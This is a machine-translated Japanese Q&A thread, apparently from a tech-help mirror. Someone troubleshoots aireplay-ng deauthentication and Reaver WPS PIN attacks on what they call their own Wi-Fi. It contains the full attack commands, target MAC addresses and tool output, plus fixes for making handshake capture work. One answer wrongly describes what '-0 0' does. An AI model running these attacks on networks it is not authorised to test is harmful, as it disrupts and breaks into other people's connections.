web-dev-qa-db-ja.com

Aireplay deauthの効果がなく、ハンドシェイクもリーバーも動かない

だから私は、エアクラックやリーバーを使って自分のWiFiをハッキングしようとしていますが、どちらにも成功していません。エアクラックでは、認証解除がターゲットデバイスに影響を与えていないように見えるため、ハンドシェイクを成功させることはできません。これが出力するものです:

root@kali:~# aireplay-ng -0 0 -a C0:05:C2:3B:8E:42 -c 98:9E:63:A1:E7:03 wlan0mon

20:21:49  Sending 64 directed DeAuth. STMAC: [98:9E:63:A5:E7:03] [ 8| 1 ACKs]

20:21:59  Sending 64 directed DeAuth. STMAC: [98:9E:63:A5:E7:03] [34| 0 ACKs]

20:21:59  Sending 64 directed DeAuth. STMAC: [98:9E:63:A5:E7:03] [ 3| 2 ACKs]

20:22:00  Sending 64 directed DeAuth. STMAC: [98:9E:63:A5:E7:03] [21| 5 ACKs]

20:22:10  Sending 64 directed DeAuth. STMAC: [98:9E:63:A5:E7:03] [ 9| 2 ACKs]

20:22:10  Sending 64 directed DeAuth. STMAC: [98:9E:63:A5:E7:03] [ 0| 0 ACKs]

20:22:11  Sending 64 directed DeAuth. STMAC: [98:9E:63:A5:E7:03] [12| 0 ACKs]

20:22:20  Sending 64 directed DeAuth. STMAC: [98:9E:63:A5:E7:03] [11| 0 ACKs]

20:22:21  Sending 64 directed DeAuth. STMAC: [98:9E:63:A5:E7:03] [ 0| 0 ACKs]

20:22:21  Sending 64 directed DeAuth. STMAC: [98:9E:63:A5:E7:03] [ 0| 0 ACKs]

さらに、aircrackを使用して、deauthコマンドを使用しようとすると、次のように表示されます。

20:24:09  Waiting for beacon frame (BSSID: C0:05:C2:3B:8E:42) on channel 6

20:24:09  wlan0mon is on channel 6, but the AP uses channel 1

ただし、通常は試すだけで2つのチャネルが同期します。これが何らかの影響を与えるかどうかはわかりませんが、私のairodumpターミナルでは、テーブルの最初の行が「固定チャネル」番号を変更し続けます。 (9は変わり続けます):

CH  1 ][ Elapsed: 7 mins ][ 2018-01-06 20:23 ][ fixed channel wlan0mon: 9 

Reaverでは、コマンドが実行され、最初のピンをチェックしますが、スタックして、これを何度も繰り返します。

[+] Waiting for beacon from C0:05:C2:4B:7D:48

[+] Switching wlan0mon to channel 1

[+] Received beacon from C0:05:C2:4B:7D:48

[+] Vendor: AtherosC

[+] Trying pin "12345670"

[+] Associated with C0:05:C2:3B:8D:41 (ESSID: VM7781911)

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

誰かがどこで間違っているのか、またはこれらの問題を解決する方法を知っていますか?

編集:カードを監視モードにすると、次のように出力されます。

PHY      Interface      Driver      Chipset

phy0     wlan0          iwlwifi     Intel corporation wireless 3165 (rev 79) 

                    (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0wlan0mon])
                    (mac80211 monitor mode vif disabled for [phy0]wlan0)

よろしいですか?

3
Non0

同じ問題が帯域幅にあるようです。 Aircrackはデフォルトで2.4Ghzを使用し、パケットを送信するアクセスポイントは5Ghzと通信している可能性があります。中断したい接続と同じように帯域幅を変更する必要があります。

Airodumpのページから:

--band <abg>          : Band on which airodump-ng should hop

これで問題が解決しました。

1
BoonMaboon

送信するパケットの量を設定する必要があります。0は0、何も送信せず、0を超える値を入れます:D(認証解除)

-0 22

root@kali:~# aireplay-ng -0 22 -a C0:05:C2:3B:8E:42 -c 98:9E:63:A1:E7:03 wlan0mon

[編集]

また、airmon-ng check kill始める前にG。Tで述べたように

1
Pixar Filmz

私も同じ問題を抱えていました。クライアントの認証を解除することはできましたが、ハンドシェイクを取得できませんでした。

最初のairodump-ngを開始する前に、次のコマンドを実行します:airmon-ng check kill

これは私にとってはトリックでした。いくつかのプロセスが、ハンドシェイクが正しくキャッチされるのを妨げていました。

また、最初のairodump-ngを実行してMacアドレスを見つけたとき。そのダンプの実行を停止します。必要なチャンネルだけを新しいものから始めます。

0
G.T